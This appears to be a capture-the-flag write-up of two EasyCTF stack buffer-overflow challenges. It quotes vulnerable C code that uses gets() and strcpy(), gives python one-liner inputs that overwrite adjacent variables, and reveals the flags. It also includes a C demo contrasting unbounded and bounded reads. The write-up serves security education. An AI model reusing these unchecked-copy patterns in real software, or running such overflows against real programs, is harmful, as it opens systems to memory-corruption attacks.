Problem info:
Can you overflow the stack? Try it at /problems/overflow1 on the EasyCTF shell server. The source is available at /problems/overflow1/overflow1.c, and the program you're trying to overflow is at /problems/overflow1/overflow1. Good luck!
On the server we see a C file called overflow.c, and it contains the source for the binary. Opening it up, the buffer overflow is quite obvious:
char buf[20];
int x = 0;
gets(buf);
if (x == 1337) {
So, we need to write past the end of buf, up the stack, and set x to 1337. 1337 in hex is 0x539. To encode this in little-endian byte order (low byte first) we use:
\x39\x05
Now, we use trial and error to see where the buffer overflows:
(python -c "print 'A'*25") | ./overflow1
After trial and error we find the number to be 28, and so we send the proper input:
(python -c "print 'A'*28 + '\x39\x05'") | ./overflow1
There is the flag
easyctf{i_wish_everything_were_th1s_34sy}
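An added example, not part of the original writeup or the challenge source: a constructed model of overflow1's locals showing why the 30-byte input sets x to 1337, and why a bounded read of the kind fgets(buf, sizeof buf, stdin) performs leaves x at 0. The struct layout, its 8 bytes of padding and the function names are assumptions; the result assumes a little-endian machine with a 4-byte int.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Constructed model of overflow1's locals. The 8 bytes of padding are an
   assumption chosen so x sits at offset 28, the distance the writeup found. */
struct frame {
    char buf[20];
    char pad[8];
    int  x;
};

/* Behaves like gets(): stores the whole line plus a NUL and never checks
   sizeof buf. Writing through the struct's byte view keeps the demo defined. */
static int unbounded_read(const char *line, size_t len) {
    struct frame f;
    memset(&f, 0, sizeof f);
    if (len > sizeof f - 1) len = sizeof f - 1;  /* keep the model itself in bounds */
    memcpy((char *)&f, line, len);
    ((char *)&f)[len] = '\0';
    return f.x;
}

/* Hardened form, the bound fgets(buf, sizeof buf, stdin) enforces: at most
   sizeof buf - 1 bytes are stored, so nothing past buf is written. */
static int bounded_read(const char *line, size_t len) {
    struct frame f;
    memset(&f, 0, sizeof f);
    if (len > sizeof f.buf - 1) len = sizeof f.buf - 1;
    memcpy(f.buf, line, len);
    f.buf[len] = '\0';
    return f.x;
}

/* The input from the writeup: 28 fill bytes, then 0x39 0x05 (1337, low byte first). */
static const char sample[] =
    "AAAAAAA" "AAAAAAA" "AAAAAAA" "AAAAAAA" "\x39\x05";

int main(void) {
    printf("offset of x: %zu\n", offsetof(struct frame, x));
    printf("unbounded: x = %d\n", unbounded_read(sample, sizeof sample - 1));
    printf("bounded:   x = %d\n", bounded_read(sample, sizeof sample - 1));
    return 0;
}
```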
To start this challenge we navigate to /problems/aplit.
Here we see a binary and a C file.
When looking at the C file, the relevant code is immediately noticed:
int main(int argc, char **argv) {
    int score = 0;
    printf("CollageBored (R) Advanced Placement Literature Grader\n");
    if (argc != 2) {
        printf("Usage: %s [essay]\n", argv[0]);
        return 1;
    }
    char buf[700];
    strcpy(buf, argv[1]);
    printf("-------------- YOUR SUBMISSION --------------\n");
    printf("%s\n", buf);
    printf("---------------------------------------------\n");
    printf("According to our analysis, your response received a grade of %d!\n", score);
    if (score > 12) {
The program copies the user's argument into a 700-byte buffer with strcpy, which does no length check, and then reads the score variable. This is a buffer overflow. The approach to this is actually quite simple. We need to see how many characters we need to pass to it to overwrite the score variable. Some trial and error is required, but eventually I found it to be 717.
redacted@shell:/problems/aplit$ ./aplit $(python -c "print 'a'*717")
And there is our flag:
CollageBored (R) Advanced Placement Literature Grader
-------------- YOUR SUBMISSION --------------
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
---------------------------------------------
According to our analysis, your response received a grade of 1633771873!
Wow, you're an HONOR student! Here's a flag: CollageBored (R) Advanced Placement Literature Grader
-------------- YOUR SUBMISSION --------------
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
---------------------------------------------
According to our analysis, your response received a grade of 1633771873!
Wow, you're an HONOR student! Here's a flag: easyctf{essays_are_too_hard}
ez
flag easyctf{essays_are_too_hard}